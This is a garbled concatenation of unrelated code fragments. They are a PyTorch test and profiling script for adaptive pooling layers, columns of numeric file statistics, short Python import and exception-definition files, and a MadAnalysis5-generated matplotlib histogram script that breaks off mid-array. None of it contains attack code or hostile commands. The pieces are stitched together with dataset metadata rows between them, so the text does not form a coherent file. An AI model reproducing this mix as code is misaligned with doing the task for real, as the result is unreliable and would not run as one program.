p_1d = EDSCWPool1d()
pool_1d = p_1d(x_1d)
p_1d = EMPool1d()
pool_1d = p_1d(x_1d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
pool_2d = p_2d(x_2d)
p_2d = EDSCWPool2d()
pool_2d = p_2d(x_2d)
p_2d = EMPool2d()
pool_2d = p_2d(x_2d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
pool_3d = p_3d(x_3d)
p_3d = EDSCWPool3d()
pool_3d = p_3d(x_3d)
p_3d = EMPool3d()
pool_3d = p_3d(x_3d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
print('\033[38;2;77;216;173m' + '--- Performing checks for backward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_1d(x_1d).pow(2).mean().backward()
p_1d = EDSCWPool1d()
p_1d(x_1d).pow(2).mean().backward()
p_1d = EMPool1d()
p_1d(x_1d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_2d(x_2d).pow(2).mean().backward()
p_2d = EDSCWPool2d()
p_2d(x_2d).pow(2).mean().backward()
p_2d = EMPool2d()
p_2d(x_2d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
p_3d(x_3d).pow(2).mean().backward()
p_3d = EDSCWPool3d()
p_3d(x_3d).pow(2).mean().backward()
p_3d = EMPool3d()
p_3d(x_3d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for float64 = = = ' + '\033[0m')
x_1d = torch.rand((4, 16, 56), device='cuda:0').double()
beta_1d = (28)
x_2d = torch.rand((4, 16, 56, 56), device='cuda:0').double()
beta_2d = (28,28)
x_3d = torch.rand((4, 16, 4, 56, 56), device='cuda:0').double()
beta_3d = (2,28,28)
print('\033[38;2;77;216;173m' + '--- Performing checks for forward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
pool_1d = p_1d(x_1d)
p_1d = EDSCWPool1d()
pool_1d = p_1d(x_1d)
p_1d = EMPool1d()
pool_1d = p_1d(x_1d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
pool_2d = p_2d(x_2d)
p_2d = EDSCWPool2d()
pool_2d = p_2d(x_2d)
p_2d = EMPool2d()
pool_2d = p_2d(x_2d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
pool_3d = p_3d(x_3d)
p_3d = EDSCWPool3d()
pool_3d = p_3d(x_3d)
p_3d = EMPool3d()
pool_3d = p_3d(x_3d)
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
print('\033[38;2;77;216;173m' + '--- Performing checks for backward ---' + '\033[0m')
print('\033[38;2;199;246;236m' + '> Checking 1D ...' + '\033[0m')
try:
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_1d(x_1d).pow(2).mean().backward()
p_1d = EDSCWPool1d()
p_1d(x_1d).pow(2).mean().backward()
p_1d = EMPool1d()
p_1d(x_1d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 2D ...' + '\033[0m')
try:
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_2d(x_2d).pow(2).mean().backward()
p_2d = EDSCWPool2d()
p_2d(x_2d).pow(2).mean().backward()
p_2d = EMPool2d()
p_2d(x_2d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;199;246;236m' + '> Checking 3D ...' + '\033[0m')
try:
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
p_3d(x_3d).pow(2).mean().backward()
p_3d = EDSCWPool3d()
p_3d(x_3d).pow(2).mean().backward()
p_3d = EMPool3d()
p_3d(x_3d).pow(2).mean().backward()
print('\033[92m' + '> PASSED' + '\033[0m')
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\033[38;2;50;50;50;48;2;85;217;192m' + ' = = = Checks for Unpool (float32) = = = ' + '\033[0m')
x_1d = torch.rand((4, 16, 40), device='cuda:0').float()
x_2d = torch.rand((4, 16, 40, 40), device='cuda:0').float()
x_3d = torch.rand((4, 16, 4, 40, 40), device='cuda:0').float()
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
beta_1d = (20)
beta_2d = (20,20)
beta_3d = (2,20,20)
p_1d = AdaPool1d(return_mask=True, dtype=x_1d.dtype,device=x_1d.get_device(),beta=beta_1d)
p_2d = AdaPool2d(return_mask=True, dtype=x_2d.dtype,device=x_2d.get_device(),beta=beta_2d)
p_3d = AdaPool3d(return_mask=True, dtype=x_3d.dtype,device=x_3d.get_device(),beta=beta_3d)
tmp, mask = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
adaunpool(tmp, mask)
print('\033[38;2;199;246;236m' +'AdaUnpool1d'+ '\033[0m')
print('\033[92m' + '> PASSED' + '\033[0m')
print(prof.key_averages())
try:
tmp, mask = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
adaunpool(tmp, mask)
print('\033[38;2;199;246;236m' +'AdaUnpool2d'+ '\033[0m')
print('\033[92m' + '> PASSED' + '\033[0m')
print(prof.key_averages())
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
try:
tmp, mask = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
adaunpool(tmp, mask)
print('\033[38;2;199;246;236m' +'AdaUnpool3d'+ '\033[0m')
print('\033[92m' + '> PASSED' + '\033[0m')
print(prof.key_averages())
except Exception as e:
print('\033[91m' + '> FAILED' + '\033[0m')
print(e)
traceback.print_tb(e.__traceback__)
print('\n'+'\033[38;2;50;50;50;48;2;199;246;236m' + '--- Float point precision Forward/Backward tests completed ---' + '\033[0m'+'\n')
print('\033[38;2;50;50;50;48;2;85;217;192m' + '= = = Profiling checks = = =' + '\033[0m')
x_1d = torch.rand((4, 16, 80), device='cuda:0').float()
x_2d = torch.rand((4, 16, 80, 80), device='cuda:0').float()
x_3d = torch.rand((4, 16, 8, 80, 80), device='cuda:0').float()
x_1d.requires_grad = True
x_2d.requires_grad = True
x_3d.requires_grad = True
beta_1d = (40)
beta_2d = (40,40)
beta_3d = (4,40,40)
p_1d = AdaPool1d(dtype=x_1d.dtype,device=x_1d.get_device(), beta=beta_1d)
p_2d = AdaPool2d(dtype=x_2d.dtype,device=x_2d.get_device(), beta=beta_2d)
p_3d = AdaPool3d(dtype=x_3d.dtype,device=x_3d.get_device(), beta=beta_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_1d(x_1d)
print('\033[38;2;199;246;236m' +'AdaPool1d [foward]'+ '\033[0m')
print(prof.key_averages())
time_f_1d_cuda = ''.join(str(prof).split('\n')[-3:])
_tt = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_1d(x_1d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'AdaPool1d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_1d_cuda = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_2d(x_2d)
print('\033[38;2;199;246;236m' +'AdaPool2d [foward]'+ '\033[0m')
time_f_2d_cuda = ''.join(str(prof).split('\n')[-3:])
print(prof.key_averages())
_tt = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_2d(x_2d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'AdaPool2d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_2d_cuda = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d)
print('\033[38;2;199;246;236m' +'AdaPool3d [foward]'+ '\033[0m')
print(prof.key_averages())
time_f_3d_cuda = ''.join(str(prof).split('\n')[-3:])
_tt = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d).backward(_tt)
print('\033[38;2;199;246;236m' +'AdaPool3d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_3d_cuda = ' '.join(str(prof).split('\n')[-3:])
p_1d = EDSCWPool1d()
p_2d = EDSCWPool2d()
p_3d = EDSCWPool3d()
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_1d(x_1d)
print('\033[38;2;199;246;236m' +'EDSCWPool1d [foward]'+ '\033[0m')
print(prof.key_averages())
time_f_1d_cuda_EDSCW = ''.join(str(prof).split('\n')[-3:])
_tt = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_1d(x_1d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EDSCWPool1d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_1d_cuda_EDSCW = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_2d(x_2d)
print('\033[38;2;199;246;236m' +'EDSCWPool2d [foward]'+ '\033[0m')
time_f_2d_cuda_EDSCW = ''.join(str(prof).split('\n')[-3:])
print(prof.key_averages())
_tt = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_2d(x_2d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EDSCWPool2d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_2d_cuda_EDSCW = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d)
print('\033[38;2;199;246;236m' +'EDSCWPool3d [foward]'+ '\033[0m')
print(prof.key_averages())
time_f_3d_cuda_EDSCW = ''.join(str(prof).split('\n')[-3:])
_tt = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d).backward(_tt)
print('\033[38;2;199;246;236m' +'EDSCWPool3d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_3d_cuda_EDSCW = ' '.join(str(prof).split('\n')[-3:])
p_1d = EMPool1d()
p_2d = EMPool2d()
p_3d = EMPool3d()
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_1d(x_1d)
print('\033[38;2;199;246;236m' +'EMPool1d [foward]'+ '\033[0m')
print(prof.key_averages())
time_f_1d_cuda_em = ''.join(str(prof).split('\n')[-3:])
_tt = p_1d(x_1d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_1d(x_1d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EMPool1d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_1d_cuda_em = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_2d(x_2d)
print('\033[38;2;199;246;236m' +'EMPool2d [foward]'+ '\033[0m')
time_f_2d_cuda_em = ''.join(str(prof).split('\n')[-3:])
print(prof.key_averages())
_tt = p_2d(x_2d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
tmp = p_2d(x_2d)
tmp.backward(tmp,retain_graph=True)
print('\033[38;2;199;246;236m' +'EMPool2d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_2d_cuda_em = ' '.join(str(prof).split('\n')[-3:])
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d)
print('\033[38;2;199;246;236m' +'EMPool3d [foward]'+ '\033[0m')
print(prof.key_averages())
time_f_3d_cuda_em = ''.join(str(prof).split('\n')[-3:])
_tt = p_3d(x_3d)
with torch.autograd.profiler.profile(use_cuda=True) as prof:
for i in range(100):
p_3d(x_3d).backward(_tt)
print('\033[38;2;199;246;236m' +'EMPool3d [forward + backward]'+ '\033[0m')
print(prof.key_averages())
time_b_3d_cuda_em = ' '.join(str(prof).split('\n')[-3:])
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'AdaPool1d [forward + backward]'+ '\033[0m')
print(time_b_1d_cuda, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EDSCWPool1d [forward + backward]'+ '\033[0m')
print(time_b_1d_cuda_EDSCW, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EMPool1d [forward + backward]'+ '\033[0m')
print(time_b_1d_cuda_em, 'for 100 iterations.')
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'AdaPool2d [forward + backward]'+ '\033[0m')
print(time_b_2d_cuda, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EDSCWPool2d [forward + backward]'+ '\033[0m')
print(time_b_2d_cuda_EDSCW, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EMPool2d [forward + backward]'+ '\033[0m')
print(time_b_2d_cuda_em, 'for 100 iterations.')
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'AdaPool3d [forward + backward]'+ '\033[0m')
print(time_b_3d_cuda, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EDSCWPool3d [forward + backward]'+ '\033[0m')
print(time_b_3d_cuda_EDSCW, 'for 100 iterations.')
print('\033[38;2;50;50;50;48;2;85;217;192m' +'EMPool3d [forward + backward]'+ '\033[0m')
print(time_b_3d_cuda_em, 'for 100 iterations.')
print('\n'+'\033[38;2;199;246;236m' +'-------------------------------'+ '\033[0m')
print('\n'+'\033[38;2;50;50;50;48;2;199;246;236m' + '--- Tests finished ---' + '\033[0m')
| 30.727545
| 164
| 0.630615
| 3,505
| 20,526
| 3.493295
| 0.03766
| 0.043287
| 0.031852
| 0.052107
| 0.952303
| 0.945279
| 0.929762
| 0.919226
| 0.901421
| 0.870059
| 0
| 0.148273
| 0.149323
| 20,526
| 667
| 165
| 30.773613
| 0.552947
| 0
| 0
| 0.779559
| 0
| 0.032064
| 0.249683
| 0.085891
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.042084
| 0.014028
| 0
| 0.014028
| 0.358717
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63cbcf94a58a06f34321ece996f3e30ea9cbcaa6
| 92
|
py
|
Python
|
allennlp_series/common/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | 1
|
2021-11-16T02:03:28.000Z
|
2021-11-16T02:03:28.000Z
|
allennlp_series/common/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | null | null | null |
allennlp_series/common/__init__.py
|
harsh19/TRUCE
|
fb9fae76f87d007d0590b21a4de3739c860ba516
|
[
"MIT"
] | null | null | null |
from allennlp_series.common.testing import *
from allennlp_series.common.constants import *
| 30.666667
| 46
| 0.847826
| 12
| 92
| 6.333333
| 0.583333
| 0.315789
| 0.473684
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 92
| 2
| 47
| 46
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
63d0f44085251b1bc775d95c62e52f06502a12b5
| 163
|
py
|
Python
|
flowmancer/typedefs/exceptions.py
|
sando-io/flowmancer
|
34e6679651b00c1e8c78e211cac493708ce9b1b7
|
[
"MIT"
] | null | null | null |
flowmancer/typedefs/exceptions.py
|
sando-io/flowmancer
|
34e6679651b00c1e8c78e211cac493708ce9b1b7
|
[
"MIT"
] | 21
|
2022-01-07T03:14:34.000Z
|
2022-01-22T22:32:20.000Z
|
flowmancer/typedefs/exceptions.py
|
natsunlee/flowmancer
|
34e6679651b00c1e8c78e211cac493708ce9b1b7
|
[
"MIT"
] | null | null | null |
class ExistingTaskName(Exception): pass
class DuplicateDependency(Exception): pass
class ExecutorDoesNotExist(Exception): pass
class MissingJobDef(Exception): pass
| 40.75
| 43
| 0.858896
| 16
| 163
| 8.75
| 0.4375
| 0.371429
| 0.385714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067485
| 163
| 4
| 44
| 40.75
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
89302960a6a2c173b2c54e5ab9dbb0bca4dcde00
| 25
|
py
|
Python
|
imaprt_api/imaprt_api/models/drawer/blend_bit.py
|
pei223/imaprt
|
473bf0f46c9ee0ef535f6b341e94eb5be9cb9172
|
[
"MIT"
] | null | null | null |
imaprt_api/imaprt_api/models/drawer/blend_bit.py
|
pei223/imaprt
|
473bf0f46c9ee0ef535f6b341e94eb5be9cb9172
|
[
"MIT"
] | 7
|
2021-03-10T22:40:15.000Z
|
2022-02-27T06:51:48.000Z
|
imaprt_api/imaprt_api/models/drawer/blend_bit.py
|
pei223/imaprt
|
473bf0f46c9ee0ef535f6b341e94eb5be9cb9172
|
[
"MIT"
] | null | null | null |
# TODO 2値画像と元画像をアルファブレンド
| 12.5
| 24
| 0.84
| 2
| 25
| 10.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.12
| 25
| 1
| 25
| 25
| 0.909091
| 0.88
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 1
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8965c186126184078d2afd8adaaa3b8dae9f9bff
| 61,322
|
py
|
Python
|
optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_10.py
|
sheride/axion_pheno
|
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
|
[
"MIT"
] | null | null | null |
optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_10.py
|
sheride/axion_pheno
|
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
|
[
"MIT"
] | null | null | null |
optimization/second_sdEta_mjj_optimization/lumi_and_kin_plots/four_cuts_lum150/Output/Histos/MadAnalysis5job_0/selection_10.py
|
sheride/axion_pheno
|
7d3fc08f5ae5b17a3500eba19a2e43f87f076ce5
|
[
"MIT"
] | null | null | null |
def selection_10():
# Library import
import numpy
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Library version
matplotlib_version = matplotlib.__version__
numpy_version = numpy.__version__
# Histo binning
xBinning = numpy.linspace(0.0,4000.0,401,endpoint=True)
# Creating data sequence: middle of each bin
xData = numpy.array([5.0,15.0,25.0,35.0,45.0,55.0,65.0,75.0,85.0,95.0,105.0,115.0,125.0,135.0,145.0,155.0,165.0,175.0,185.0,195.0,205.0,215.0,225.0,235.0,245.0,255.0,265.0,275.0,285.0,295.0,305.0,315.0,325.0,335.0,345.0,355.0,365.0,375.0,385.0,395.0,405.0,415.0,425.0,435.0,445.0,455.0,465.0,475.0,485.0,495.0,505.0,515.0,525.0,535.0,545.0,555.0,565.0,575.0,585.0,595.0,605.0,615.0,625.0,635.0,645.0,655.0,665.0,675.0,685.0,695.0,705.0,715.0,725.0,735.0,745.0,755.0,765.0,775.0,785.0,795.0,805.0,815.0,825.0,835.0,845.0,855.0,865.0,875.0,885.0,895.0,905.0,915.0,925.0,935.0,945.0,955.0,965.0,975.0,985.0,995.0,1005.0,1015.0,1025.0,1035.0,1045.0,1055.0,1065.0,1075.0,1085.0,1095.0,1105.0,1115.0,1125.0,1135.0,1145.0,1155.0,1165.0,1175.0,1185.0,1195.0,1205.0,1215.0,1225.0,1235.0,1245.0,1255.0,1265.0,1275.0,1285.0,1295.0,1305.0,1315.0,1325.0,1335.0,1345.0,1355.0,1365.0,1375.0,1385.0,1395.0,1405.0,1415.0,1425.0,1435.0,1445.0,1455.0,1465.0,1475.0,1485.0,1495.0,1505.0,1515.0,1525.0,1535.0,1545.0,1555.0,1565.0,1575.0,1585.0,1595.0,1605.0,1615.0,1625.0,1635.0,1645.0,1655.0,1665.0,1675.0,1685.0,1695.0,1705.0,1715.0,1725.0,1735.0,1745.0,1755.0,1765.0,1775.0,1785.0,1795.0,1805.0,1815.0,1825.0,1835.0,1845.0,1855.0,1865.0,1875.0,1885.0,1895.0,1905.0,1915.0,1925.0,1935.0,1945.0,1955.0,1965.0,1975.0,1985.0,1995.0,2005.0,2015.0,2025.0,2035.0,2045.0,2055.0,2065.0,2075.0,2085.0,2095.0,2105.0,2115.0,2125.0,2135.0,2145.0,2155.0,2165.0,2175.0,2185.0,2195.0,2205.0,2215.0,2225.0,2235.0,2245.0,2255.0,2265.0,2275.0,2285.0,2295.0,2305.0,2315.0,2325.0,2335.0,2345.0,2355.0,2365.0,2375.0,2385.0,2395.0,2405.0,2415.0,2425.0,2435.0,2445.0,2455.0,2465.0,2475.0,2485.0,2495.0,2505.0,2515.0,2525.0,2535.0,2545.0,2555.0,2565.0,2575.0,2585.0,2595.0,2605.0,2615.0,2625.0,2635.0,2645.0,2655.0,2665.0,2675.0,2685.0,2695.0,2705.0,2715.0,2725.0,2735.0,2745.0,2755.0,2765.0,2775.0,2785.0,2795.0,2805.0,2815.0,2825.0,2835.0,2845.0,2855.0,2865.0,2875.0,2885.0,2895.0,2905.0,2915.0,2925.0,2935.0,2945.0,2955.0,2965.0,2975.0,2985.0,2995.0,3005.0,3015.0,3025.0,3035.0,3045.0,3055.0,3065.0,3075.0,3085.0,3095.0,3105.0,3115.0,3125.0,3135.0,3145.0,3155.0,3165.0,3175.0,3185.0,3195.0,3205.0,3215.0,3225.0,3235.0,3245.0,3255.0,3265.0,3275.0,3285.0,3295.0,3305.0,3315.0,3325.0,3335.0,3345.0,3355.0,3365.0,3375.0,3385.0,3395.0,3405.0,3415.0,3425.0,3435.0,3445.0,3455.0,3465.0,3475.0,3485.0,3495.0,3505.0,3515.0,3525.0,3535.0,3545.0,3555.0,3565.0,3575.0,3585.0,3595.0,3605.0,3615.0,3625.0,3635.0,3645.0,3655.0,3665.0,3675.0,3685.0,3695.0,3705.0,3715.0,3725.0,3735.0,3745.0,3755.0,3765.0,3775.0,3785.0,3795.0,3805.0,3815.0,3825.0,3835.0,3845.0,3855.0,3865.0,3875.0,3885.0,3895.0,3905.0,3915.0,3925.0,3935.0,3945.0,3955.0,3965.0,3975.0,3985.0,3995.0])
# Creating weights for histo: y11_M_0
y11_M_0_weights = numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,20.2043081043,19.789783451,20.0661282199,20.4653078861,20.9719474624,21.601406936,21.7242268333,22.2155214225,22.7682259603,23.6586852156,23.8275700744,23.5358653183,23.0599307163,25.9616032898,24.7333893169,24.9943890987,23.6433402285,25.9308983155,25.5317336493,25.7773734439,24.5337994838,24.6259144068,25.593143598,23.4590953825,23.7047501771,24.2881596892,23.6740452028,23.7200951643,22.8142759218,23.7815051129,22.9831607805,22.8296359089,23.6433402285,22.8910458576,23.1059806778,23.2902255238,21.4478820644,22.7068160116,21.6781768718,22.2462263968,21.9545216407,22.5379311529,22.7682259603,21.1561773083,22.3844062812,21.509292013,22.0159315894,20.6802427063,20.4346029117,20.2350130786,21.0947673597,20.2043081043,19.9433083226,19.5901936179,19.8511933996,19.5901936179,20.2810630401,18.9760791314,18.8839642084,18.1470298247,16.9495058261,18.0088499403,18.3466196578,18.0856198761,17.3947354538,17.4868503768,18.3466196578,18.3466196578,16.1511614937,15.7826868019,16.0743915579,17.1337356721,15.890161712,15.030407431,15.3067521999,15.3681621485,15.3835221357,14.8768780593,15.6598669046,14.9075830337,15.8594567377,14.6465862519,13.9557093297,13.9096503682,14.2167076114,14.0171207783,14.2320600986,13.7254175222,13.986414304,13.7714749837,14.2474125857,12.7735423182,12.6660719081,12.3283111906,12.5125440365,12.7581898311,13.0959520486,12.8042472926,11.9598424987,11.8677260757,12.0980178831,11.4685524095,11.5606703325,11.4378474352,11.5913753068,11.3917884737,11.1000852176,11.0079687947,11.0693802433,11.0079687947,10.7623230001,11.1461441791,10.3631508339,10.0560935907,10.086800065,9.87186074474,10.1175050393,10.3785033211,10.3170918724,8.67434124616,9.85650675758,9.27310024545,8.72039870764,8.99674947655,8.67434124616,9.30380671977,9.19633630964,8.13699219551,8.36728400293,8.84322160493,7.93740536241,8.0602282597,7.90670038809,7.86064142661,8.0602282597,7.87599391377,7.96811183674,7.41541029893,7.32329237596,7.61499563203,7.18511699151,6.84735627396,6.98553165841,6.87806124828,6.61706296654,7.15441201718,7.01623663273,6.47888758209,6.46353509492,6.46353509492,6.70918088951,6.27930074899,6.35606618479,6.75523835099,5.78801065983,6.44818260776,6.21789080034,5.52701387808,5.97224500576,6.03365645441,5.91083355712,5.51166139092,5.80336464699,4.94360586595,5.15854518621,5.31207455782,5.23531062202,5.57307133957,